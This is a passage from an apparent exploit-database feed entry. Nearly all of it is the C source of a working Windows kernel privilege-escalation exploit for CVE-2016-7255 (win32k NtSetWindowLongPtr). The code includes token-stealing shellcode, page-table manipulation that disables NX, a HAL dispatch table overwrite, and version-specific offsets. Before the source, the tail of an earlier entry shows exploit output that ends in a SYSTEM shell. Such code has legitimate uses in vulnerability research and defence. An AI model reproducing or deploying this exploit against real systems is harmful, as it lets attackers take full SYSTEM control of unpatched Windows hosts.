99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n \r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n \r\nC:\\Users\\qa\\Desktop>\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/26414", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-04T07:12:42", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-01-11T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-11T00:00:00", "href": "https://0day.today/exploit/description/26645", "id": "1337DAY-ID-26645", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n \r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n \r\n// ricklarabee.blogspot.com\r\n \r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n \r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n \r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n \r\n// Credits: [email\u00a0protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n \r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n \r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG 
ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n OUT PULONG Interval);\r\n \r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n //0xcc,\r\n 0xfa, // CLI\r\n 0x9c, // PUSHFQ\r\n 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer\r\n 0x50, // PUSH RAX\r\n 0x51, // PUSH RCX\r\n 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX\r\n 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID\r\n 0x53, // PUSH RBX\r\n \r\n 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188\r\n 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n //<tag>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4\r\n 0x75, 0xf3, // JNE <tag>\r\n 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n \r\n 0x53, // PUSH RBX\r\n //<tag2>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x39, 0xcb, // CMP EBX, ECX // our PID\r\n 0x75, 0xf5, // JNE <tag2>\r\n 0x5b, // POP RBX\r\n 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX\r\n \r\n 0x5b, // POP RBX\r\n 0x59, // POP RCX\r\n 0x58, // POP RAX\r\n 0x9d, // POPFQ\r\n \r\n 0xfb, // STI\r\n 0xff, 0xe0 // JMP RAX\r\n};\r\n \r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList = NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n if (NULL == 
pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n \r\n va_start(VaList, Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n \r\n \r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\nint _sim_key_down(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_key_up(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_alt_shift_esc()\r\n{\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n for (i = 0; i < nCount; i++)\r\n {\r\n _sim_key_down(VK_TAB);\r\n _sim_key_up(VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\nint _sim_alt_esc(int count)\r\n{\r\n int i = 0;\r\n \r\n for (i = 0; i<count; i++)\r\n {\r\n _sim_key_down(VK_MENU);\r\n //_sim_key_down(VK_SHIFT);\r\n \r\n \r\n 
_sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n //_sim_key_up(VK_SHIFT);\r\n \r\n }\r\n \r\n return 0;\r\n}\r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = { 0 };\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = { 0 };\r\n \r\n UINT64 value = 0;\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if (0 == RegisterClassExW(&stWC))\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n#ifdef _WIN64\r\n pId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n pId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n \r\n ShowWindow(hWndParent, SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild, GetDesktopWindow());\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild, TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n while (GetMessage(&stMsg, NULL, 0, 0)) {\r\n \r\n SetFocus(hWndParent);\r\n _sim_alt_esc(20);\r\n SetFocus(hWndChild);\r\n _sim_alt_esc(20);\r\n \r\n TranslateMessage(&stMsg);\r\n 
DispatchMessage(&stMsg);\r\n \r\n if (value != 0) {\r\n break;\r\n }\r\n \r\n \r\n __try {\r\n value = *(UINT64 *)PML4_SELF_REF;\r\n if ((value & 0x67) == 0x67) {\r\n printf(\"Value Self Ref = %llx\\n\", value);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n continue;\r\n }\r\n \r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if (NULL != hWndParent)\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if (NULL != hWndChild)\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n \r\n return 0;\r\n}\r\n \r\nUINT64 get_pxe_address(UINT64 address) {\r\n UINT entry = PML4_SELF_REF_INDEX;\r\n UINT64 result = address >> 9;\r\n UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n result = result | lower_boundary;\r\n result = result & upper_boundary;\r\n return result;\r\n}\r\n \r\nUINT64 look_free_entry_pml4(void) {\r\n // Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n int offset = 0xF00;\r\n UINT64 pml4_search = PML4_BASE + offset;\r\n while (offset < 0xFF8)\r\n {\r\n if ((*(PVOID *)pml4_search) == 0x0)\r\n {\r\n // This is a NULL (free) entry\r\n break;\r\n }\r\n offset += 8;\r\n pml4_search = PML4_BASE + offset;\r\n }\r\n return pml4_search;\r\n}\r\n \r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n UINT64 index = (spurious_offset & 0xFFF) / 8;\r\n UINT64 result = (\r\n ((UINT64)0xFFFF << 48) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n (index << 12)\r\n );\r\n return result;\r\n}\r\n \r\n \r\n \r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n \r\n /*\r\n 1: kd> !pte ffffffff`ffd00000\r\n VA ffffffffffd00000\r\n PXE at FFFFF6FB7DBEDFF8 PPE 
at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n */ \r\n \r\n UINT64 pte = get_pxe_address(virtual_address);\r\n int pte_offset = pte & 0xFFF;\r\n //printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n \r\n UINT64 pde = get_pxe_address(pte);\r\n int pde_offset = pde & 0xFFF;\r\n //printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n \r\n UINT64 pdpte = get_pxe_address(pde);\r\n int pdpte_offset = pdpte & 0xFFF;\r\n //printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n \r\n UINT64 pml4e = get_pxe_address(pdpte);\r\n int pml4e_offset = pml4e & 0xFFF;\r\n //printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n \r\n UINT64 spurious_offset = look_free_entry_pml4();\r\n printf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n UINT64 f_e_pml4 = spurious_offset;\r\n UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n printf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n printf(\"--------------------------------------------------\\n\\n\");\r\n \r\n \r\n //Read the physical address of pml4e \r\n UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n printf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n // Change the PxE\r\n pml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n \r\n printf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pdpte\r\n UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n printf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n // Change the PxE\r\n pdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n *((PVOID 
*)spurious_offset) = (PVOID)pdpte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pde\r\n UINT64 pde_addr = spurious_pt + pde_offset;\r\n UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n printf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n // Change the PxE\r\n pde_pfn = pde_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pte\r\n UINT64 pte_addr = spurious_pt + pte_offset;\r\n UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n printf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n // Change the PxE\r\n pte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n if (patch_original) {\r\n printf(\"*** Patching the original location to enable NX...\\n\");\r\n *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n }\r\n \r\n printf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n printf(\"\\n\\n\");\r\n return spurious_pt;\r\n}\r\n \r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n printf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteAddress += (target_address & 0xFFF);\r\n printf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n \r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteTarget += (target_address & 0xFFF);\r\n 
UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n printf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n *(PVOID *)target = (PVOID)hook_address;\r\n}\r\n \r\n \r\nUINT64 store_shellcode_in_hal(void) {\r\n //// Finally store the shellcode on the HAL\r\n \r\n UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n \r\n printf(\"HAL address: %llx\\n\", hal_heap);\r\n // 0xffffffffffd00d50 this is a good offset to store shellcode \r\n // 0xfff - 0xd50 = 0x2af space\r\n \r\n memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n return 0xffffffffffd00d50;\r\n}\r\n \r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n \r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n \r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n \r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n 
pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n \r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n \r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n \r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n \r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n \r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n \r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n \r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n \r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n \r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\nint __cdecl main(int argc, char** argv)\r\n{\r\n TCHAR pre_username[256];\r\n TCHAR post_username[256];\r\n DWORD size = 256;\r\n ULONG Interval = 0;\r\n HMODULE hNtDll = NULL;\r\n UINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // 
define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n int osversion;\r\n \r\n if (argc != 2) {\r\n printf(\"Please enter an OS version\\n\");\r\n printf(\"The following OS'es are supported:\\n\");\r\n printf(\"\\t[*] 7 - Windows 7\\n\");\r\n printf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n printf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n printf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n printf(\"\\n\");\r\n printf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n return -1;\r\n }\r\n \r\n osversion = _strtoui64(argv[1], NULL, 10);\r\n \r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; // QueryIntervalProfile \r\n }\r\n else if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 10)\r\n {\r\n // the target machine's OS is 
Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n printf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n printf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n printf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n printf(\"Current Username: %s\\n\", pre_username);\r\n printf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n 
